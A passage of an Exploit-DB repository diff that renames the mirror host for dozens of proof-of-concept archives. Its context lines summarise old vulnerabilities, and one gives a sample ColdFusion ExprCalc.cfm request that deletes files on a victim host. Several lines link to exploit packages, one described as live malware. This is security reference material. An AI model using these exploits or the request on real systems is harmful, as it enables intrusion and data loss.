milw0rm.com [2008-07-31] \ No newline at end of file diff --git a/exploits/multiple/dos/6237.txt b/exploits/multiple/dos/6237.txt index 06a0ecaaa..1918ab63e 100644 --- a/exploits/multiple/dos/6237.txt +++ b/exploits/multiple/dos/6237.txt @@ -1,5 +1,5 @@ NULL pointer in Ventrilo 3.0.2 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6237.zip (2008-ventrilobotomy.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6237.zip (2008-ventrilobotomy.zip) # milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/exploits/multiple/dos/6252.txt b/exploits/multiple/dos/6252.txt index 364070cfb..059d2879d 100644 --- a/exploits/multiple/dos/6252.txt +++ b/exploits/multiple/dos/6252.txt @@ -56,7 +56,7 @@ Credit : g_ (g_ # orange-bat # com) http://www.orange-bat.com/adv/2008/vlc.dos.tta -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6252.tta (2008-vlc.dos.tta) +backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6252.tta (2008-vlc.dos.tta) - - PGP - diff --git a/exploits/multiple/dos/6622.txt b/exploits/multiple/dos/6622.txt index de289ecca..7bb97b1e3 100644 --- a/exploits/multiple/dos/6622.txt +++ b/exploits/multiple/dos/6622.txt @@ -8,6 +8,6 @@ with a malformed Tamosoft CommView .ncf packet capture: Err file wtap.c: line 620 (wtap_read): assertion failed: (wth->phdr.pkt_encap != WTAP_ENCAP_PER_PACKET) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6622.ncf (2008-wireshark.ncf) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6622.ncf (2008-wireshark.ncf) # milw0rm.com [2008-09-29] \ No newline at end of file diff --git a/exploits/multiple/dos/8285.txt b/exploits/multiple/dos/8285.txt index 80fc453b9..1e333e4dc 100644 --- a/exploits/multiple/dos/8285.txt +++ b/exploits/multiple/dos/8285.txt @@ -2,6 +2,6 @@ // k`sOSe - works both in windows and linux -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8285.tar.gz (2009-ffox-poc.tar.gz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8285.tar.gz (2009-ffox-poc.tar.gz) # milw0rm.com [2009-03-25] \ No newline at end of file diff --git a/exploits/multiple/dos/8826.txt b/exploits/multiple/dos/8826.txt index 3fd26355f..18c2871f8 100644 --- a/exploits/multiple/dos/8826.txt +++ b/exploits/multiple/dos/8826.txt @@ -1,5 +1,5 @@ Acrobat <= 9.1.1 Stack Overflow Crashy PoC -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8826.pdf (2009-crashy_the_clown.pdf) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8826.pdf (2009-crashy_the_clown.pdf) # milw0rm.com [2009-05-29] \ No newline at end of file diff --git a/exploits/multiple/dos/9731.txt b/exploits/multiple/dos/9731.txt index 2b2de9ae3..07420c5bb 100644 --- a/exploits/multiple/dos/9731.txt +++ b/exploits/multiple/dos/9731.txt @@ -20,5 +20,5 @@ snort-2.8.4 snort-2.8.5.beta* link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html -poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2009-snort-unified1_bug.tar.gz +poc: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2009-snort-unified1_bug.tar.gz # milw0rm.com [2009-09-21] \ No newline at end of file diff --git a/exploits/multiple/local/10207.txt b/exploits/multiple/local/10207.txt index 746e2619e..b6a8ea938 100644 --- a/exploits/multiple/local/10207.txt +++ b/exploits/multiple/local/10207.txt @@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401 VMWare ESX Server 3.5 ESX350-200910401 VMWare ACE 2.5.3 Build 185404 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz) \ No newline at end of file diff --git a/exploits/multiple/local/10326.txt b/exploits/multiple/local/10326.txt index fd29ebc64..99f2d882a 100644 --- a/exploits/multiple/local/10326.txt +++ b/exploits/multiple/local/10326.txt @@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56 Ghostscript Ghostscript 8.54 Ghostscript Ghostscript 8.15 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10326.ps (2009-12-05-34340.ps) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10326.ps (2009-12-05-34340.ps) \ No newline at end of file diff --git a/exploits/multiple/local/19547.txt b/exploits/multiple/local/19547.txt index e7892eef0..f2a14bc52 100644 --- a/exploits/multiple/local/19547.txt +++ b/exploits/multiple/local/19547.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19547.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19547.tgz \ No newline at end of file diff --git a/exploits/multiple/local/21117.txt b/exploits/multiple/local/21117.txt index a1a13cf45..ce8683624 100644 --- a/exploits/multiple/local/21117.txt +++ b/exploits/multiple/local/21117.txt @@ -8,4 +8,4 @@ These problems could be exploited to allow a local attacker to execute arbitrary This situation could be leveraged by the attacker to gain root privileges on the host. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21117.tar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21117.tar \ No newline at end of file diff --git a/exploits/multiple/local/28817.txt b/exploits/multiple/local/28817.txt index ed8898c87..fd69fffcf 100644 --- a/exploits/multiple/local/28817.txt +++ b/exploits/multiple/local/28817.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to delete arbitrary files within the context Versions 3.6.cpu, 3.6.cpj are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28817.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28817.zip \ No newline at end of file diff --git a/exploits/multiple/local/30039.txt b/exploits/multiple/local/30039.txt index efc7df96a..b8217a7ef 100644 --- a/exploits/multiple/local/30039.txt +++ b/exploits/multiple/local/30039.txt @@ -11,6 +11,6 @@ The following applications are vulnerable to this issue: Other applications and versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30039-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30039-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30039-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30039-2.zip \ No newline at end of file diff --git a/exploits/multiple/local/30970.txt b/exploits/multiple/local/30970.txt index 5eae9d859..397467434 100644 --- a/exploits/multiple/local/30970.txt +++ b/exploits/multiple/local/30970.txt @@ -6,4 +6,4 @@ Exploiting these issues can allow local attackers to execute arbitrary code in t Versions prior to White_Dune 0.29beta795 are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30970.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30970.zip \ No newline at end of file diff --git a/exploits/multiple/local/32055.txt b/exploits/multiple/local/32055.txt index a601d46e7..e2f095e6a 100644 --- a/exploits/multiple/local/32055.txt +++ b/exploits/multiple/local/32055.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue can allow an attacker to execute arbitrary co Netrw 127 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32055.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32055.zip \ No newline at end of file diff --git a/exploits/multiple/local/32501.txt b/exploits/multiple/local/32501.txt index f01112f6f..7ba85439d 100644 --- a/exploits/multiple/local/32501.txt +++ b/exploits/multiple/local/32501.txt @@ -12,4 +12,4 @@ MIFARE Classic is prone to multiple security weaknesses: Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32501.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32501.tgz \ No newline at end of file diff --git a/exploits/multiple/local/39595.txt b/exploits/multiple/local/39595.txt index 35d920b1b..2b954fd15 100644 --- a/exploits/multiple/local/39595.txt +++ b/exploits/multiple/local/39595.txt @@ -104,4 +104,4 @@ Note that the race window is still quite tight so you may have to try a few time Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39595.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39595.zip \ No newline at end of file diff --git a/exploits/multiple/local/40931.txt b/exploits/multiple/local/40931.txt index 8579cf53f..8671d41c8 100644 --- a/exploits/multiple/local/40931.txt +++ b/exploits/multiple/local/40931.txt @@ -576,4 +576,4 @@ Shell: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40931.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40931.zip \ No newline at end of file diff --git a/exploits/multiple/local/41021.md b/exploits/multiple/local/41021.md index 18a3cd843..6719136e4 100644 --- a/exploits/multiple/local/41021.md +++ b/exploits/multiple/local/41021.md @@ -1,5 +1,5 @@ For those who only care about one thing: [the PoC is here.](https://rol.im/kpwned.zip) -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41021.zip +Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41021.zip ## Overview diff --git a/exploits/multiple/local/41870.txt b/exploits/multiple/local/41870.txt index 6d15a7188..9f2cf6c88 100644 --- a/exploits/multiple/local/41870.txt +++ b/exploits/multiple/local/41870.txt @@ -218,4 +218,4 @@ Proof of Concept: privesc_poc.tar.gz ################################################################################ Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41870.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41870.zip \ No newline at end of file diff --git a/exploits/multiple/local/41904.txt b/exploits/multiple/local/41904.txt index 582d86543..aef917288 100644 --- a/exploits/multiple/local/41904.txt +++ b/exploits/multiple/local/41904.txt @@ -315,4 +315,4 @@ the VM to restore network connectivity. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41904.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41904.zip \ No newline at end of file diff --git a/exploits/multiple/local/42407.txt b/exploits/multiple/local/42407.txt index 1c728758b..70568fd19 100644 --- a/exploits/multiple/local/42407.txt +++ b/exploits/multiple/local/42407.txt @@ -77,4 +77,4 @@ The exploit isn't hugely reliable - the race condition needs quite exact timing Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42407.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42407.zip \ No newline at end of file diff --git a/exploits/multiple/local/43887.txt b/exploits/multiple/local/43887.txt index 8838acae0..fb7c683ec 100644 --- a/exploits/multiple/local/43887.txt +++ b/exploits/multiple/local/43887.txt @@ -71,7 +71,7 @@ Patches that fix these vulnerabilities can be obtained from the ICU project in [ >> References: -[1] https://github.com/pedrib/PoC/raw/master/generic/i-c-u-fail.7z (EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43887.zip) +[1] https://github.com/pedrib/PoC/raw/master/generic/i-c-u-fail.7z (EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43887.zip) [2] https://www.kb.cert.org/vuls/id/602540 [3] http://bugs.icu-project.org/trac/changeset/37080 [4] http://bugs.icu-project.org/trac/changeset/37162 diff --git a/exploits/multiple/remote/13787.txt b/exploits/multiple/remote/13787.txt index b0f32af3e..aeba7deab 100644 --- a/exploits/multiple/remote/13787.txt +++ b/exploits/multiple/remote/13787.txt @@ -9,4 +9,4 @@ NOTE: This was taken out of live malware and was not modified. BEWARE. By visiting the following link, you agree that you are responsible for any damages that occur. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc) \ No newline at end of file diff --git a/exploits/multiple/remote/1791.patch b/exploits/multiple/remote/1791.patch index 4e6ba6161..042a60833 100644 --- a/exploits/multiple/remote/1791.patch +++ b/exploits/multiple/remote/1791.patch @@ -16,4 +16,4 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); } E-DB Note: -Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) \ No newline at end of file +Compiled: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) \ No newline at end of file diff --git a/exploits/multiple/remote/1799.txt b/exploits/multiple/remote/1799.txt index 2e7387ade..654b29c4d 100644 --- a/exploits/multiple/remote/1799.txt +++ b/exploits/multiple/remote/1799.txt @@ -1,8 +1,8 @@ class101 - http://heapoverflow.com RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners --------------------------------------------------------------------- -windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) -linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) +windows: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) +linux: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) comments: http://heapoverflow.com/viewtopic.php?p=1729 --------------------------------------------------------------------- diff --git a/exploits/multiple/remote/18245.py b/exploits/multiple/remote/18245.py index 98feba0f4..fd777a3e7 100755 --- a/exploits/multiple/remote/18245.py +++ b/exploits/multiple/remote/18245.py @@ -19,7 +19,7 @@ Author: Gary O'leary-Steele @ Sec-1 Ltd Date: 5th September 2011 Release date: Private -Full Package: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18245.zip +Full Package: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18245.zip C:\git\splunk>python splunk_exploit.py -h Usage: Run splunk_exploit.py -h to see usage options diff --git a/exploits/multiple/remote/18619.txt b/exploits/multiple/remote/18619.txt index ebc500a48..0ef2597b9 100644 --- a/exploits/multiple/remote/18619.txt +++ b/exploits/multiple/remote/18619.txt @@ -25,4 +25,4 @@ Enjoy :> /Kingcope -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18619.zip (tomcat-remote.zip) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18619.zip (tomcat-remote.zip) \ No newline at end of file diff --git a/exploits/multiple/remote/18763.txt b/exploits/multiple/remote/18763.txt index 033ca7806..53a6aed7e 100644 --- a/exploits/multiple/remote/18763.txt +++ b/exploits/multiple/remote/18763.txt @@ -15,7 +15,7 @@ Proof of concept: Code demonstrating the vulnerability can be found at https://github.com/jelmerk/LPS-24562-proof -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18763.tar.gz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18763.tar.gz Systems affected: diff --git a/exploits/multiple/remote/19093.txt b/exploits/multiple/remote/19093.txt index 213c4392e..1b8ac4902 100644 --- a/exploits/multiple/remote/19093.txt +++ b/exploits/multiple/remote/19093.txt @@ -10,4 +10,4 @@ http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFileP Now replace the "dummy.txt" string by "ExprCalc.cfm" to delete that file. We can now upload and execute ColdFusion files in the server without them being deleted. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19093.cfm \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19093.cfm \ No newline at end of file diff --git a/exploits/multiple/remote/19451.txt b/exploits/multiple/remote/19451.txt index e04b8f3bf..fd18a4cb4 100644 --- a/exploits/multiple/remote/19451.txt +++ b/exploits/multiple/remote/19451.txt @@ -41,4 +41,4 @@ Preference: If the preference is not specified, it will use a default of 1000, w 2nd Router Addr: By using the '-r' flag and specifying a second router address entry, the packet can contain a bogus source address and still be processed for correct gateway entries by the end host. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19451.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19451.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/19459.txt b/exploits/multiple/remote/19459.txt index 006ddd3a8..eb147caf1 100644 --- a/exploits/multiple/remote/19459.txt +++ b/exploits/multiple/remote/19459.txt @@ -4,4 +4,4 @@ Ircd hybrid-6 (up to beta 58) has a vulnerability which can allow remote access This vulnerability is in the invite handling code (m_invite). In a channel with operators (ops) and modes +pi (paranoid + invite-only), a channel invitation is reported to all other operators. The buffer used to store the invitation notice can be overflown by up to 15 bytes. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19459.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19459.tgz \ No newline at end of file diff --git a/exploits/multiple/remote/19749.txt b/exploits/multiple/remote/19749.txt index a26efb5ed..ef1d8b138 100644 --- a/exploits/multiple/remote/19749.txt +++ b/exploits/multiple/remote/19749.txt @@ -6,4 +6,4 @@ A potential denial of service (hence forth referred to as DoS) attack exists in The vulnerability exists in the way name servers will behave in the event that they are unable to receive replies for a domain from a nameserver they consider authoritative. When a nameserver receives a query, it is typically forwarded up a chain of DNS server. If the query cannot be resolved because there is no nameserver listening on the remote host, every forwarding nameserver will attempt to resolve the nameserver themselves. These are typically retried three times, at 0, 12 and 24 seconds. In this case, the traffic is significantly multiplied. By abusing multiple nameservers, it becomes possible to send a large quantity of data to a given network, with packet sizes as large as 500 bytes. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19749.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19749.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20139.txt b/exploits/multiple/remote/20139.txt index 547c1ee91..58539b958 100644 --- a/exploits/multiple/remote/20139.txt +++ b/exploits/multiple/remote/20139.txt @@ -16,4 +16,4 @@ By combining these two flaws a malicious applet can accept connections from any Both Netscape and Microsoft Java Virtual Machines are affected by this vulnerability, however in Microsoft products the file: URL type will not be effective in reading files, meaning that only web-available documents can be retreived via this method. However, the file: method will verify the existence of a file. It will check to see if the file exists and if it does not, it will return a SecurityException error message. Netscape browsers will pass both web documents and local files to the attacker. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20139.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20139.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20140.txt b/exploits/multiple/remote/20140.txt index b6b4f9156..fd447b423 100644 --- a/exploits/multiple/remote/20140.txt +++ b/exploits/multiple/remote/20140.txt @@ -8,4 +8,4 @@ Netscape's netscape.net.URLConnection and netscape.net.URLInputStream classes se If the machine running the malicious applet is behind a firewall it will also be able to download resources that can be accessed via a URL, such as web server ("http://" or "https://) or FTP servers ("ftp://"), that the attacker in control of the machine from which the applet was downloaded could not. In this way a malicious applet could be used to penetrate a firewall. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20140.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20140.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20181.txt b/exploits/multiple/remote/20181.txt index f90f49c1e..682eafaba 100644 --- a/exploits/multiple/remote/20181.txt +++ b/exploits/multiple/remote/20181.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1616/info Kerberos is a cryptographic authentication protocol that allows users of a network to access services without transmitting cleartext passwords. A common implementation of the protocol includes a login service which is vulnerable to an attack which involves spoofing responses from the Key Distribution Center (KDC). The login service authenticates a user by first requesting a ticket granting ticket (TGT) from the authentication server. If the TGT can be decrypted using the password supplied by the user, the login service attempts to verify the identity of the KDC by making a request with the received TGT for a service ticket for itself. The service ticket returned by the KDC is encrypted with a secret shared between the KDC and the service host. If the service ticket cannot be verified with the service's secret key it is assumed that the KDC is not authentic. If the login service has not been registered as a principal with the KDC or the service's secret key has not been installed on the host the login service will proceed without verification that the TGT was returned by the authentic KDC. In these circumstances it is possible to log into the server illicitly if an attacker can spoof responses from the Key Distribution Center. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20181.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20181.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20259.txt b/exploits/multiple/remote/20259.txt index 6aa8cb057..2cd292f4b 100644 --- a/exploits/multiple/remote/20259.txt +++ b/exploits/multiple/remote/20259.txt @@ -8,4 +8,4 @@ After receiving a request to update the Yello Pages maps, 'ypupdated' executes a This is issue is tracked by Sun BugIDs 1230027 and 1232146. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20259.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20259.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20685.txt b/exploits/multiple/remote/20685.txt index a75adb87b..c3087c84b 100644 --- a/exploits/multiple/remote/20685.txt +++ b/exploits/multiple/remote/20685.txt @@ -8,4 +8,4 @@ Compromise of the user accounts could result in disclosure of sensitive informat Compromise of administrator accounts could result in disclosure of sensitive information, changes to website functionality, and, potentially, could assist in further compromises of security on the affected host. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20685.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20685.zip \ No newline at end of file diff --git a/exploits/multiple/remote/20738.txt b/exploits/multiple/remote/20738.txt index a7ecebe1d..765e20924 100644 --- a/exploits/multiple/remote/20738.txt +++ b/exploits/multiple/remote/20738.txt @@ -6,4 +6,4 @@ When a user opens a document for verification in PGP, its corresponding .sig fil Due to a flaw in the implementation of the decoder, an arbitrary file can be created on a users system. The file created would be of the attackers choice. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20738.doc.sig \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20738.doc.sig \ No newline at end of file diff --git a/exploits/multiple/remote/20881.txt b/exploits/multiple/remote/20881.txt index 756ebb979..ed8f2fd14 100644 --- a/exploits/multiple/remote/20881.txt +++ b/exploits/multiple/remote/20881.txt @@ -5,4 +5,4 @@ The IPC@Chip is a single-chip embedded webserver from Beck GmbH. The device's inbuilt telnetd service may allow a remote user to repeatedly attempt to login to a given account, without logging or responding to repeated failed login attempts. This could permit an attacker to brute-force a known account name, potentially leading to a compromise of the device's accounts and/or allowing a compromise of its function. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20881.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20881.zip \ No newline at end of file diff --git a/exploits/multiple/remote/20889.txt b/exploits/multiple/remote/20889.txt index d9a6aceee..c540080fb 100644 --- a/exploits/multiple/remote/20889.txt +++ b/exploits/multiple/remote/20889.txt @@ -6,4 +6,4 @@ It is possible for attackers to create an encrypted document that will exploit a This vulnerability may lead to remote attackers gaining access to client hosts. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20889.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20889.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20891.txt b/exploits/multiple/remote/20891.txt index 54799db3f..4cd3d35e3 100644 --- a/exploits/multiple/remote/20891.txt +++ b/exploits/multiple/remote/20891.txt @@ -4,4 +4,4 @@ eSafe Gateway is a security utility used for filtering internet content. An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply encoding the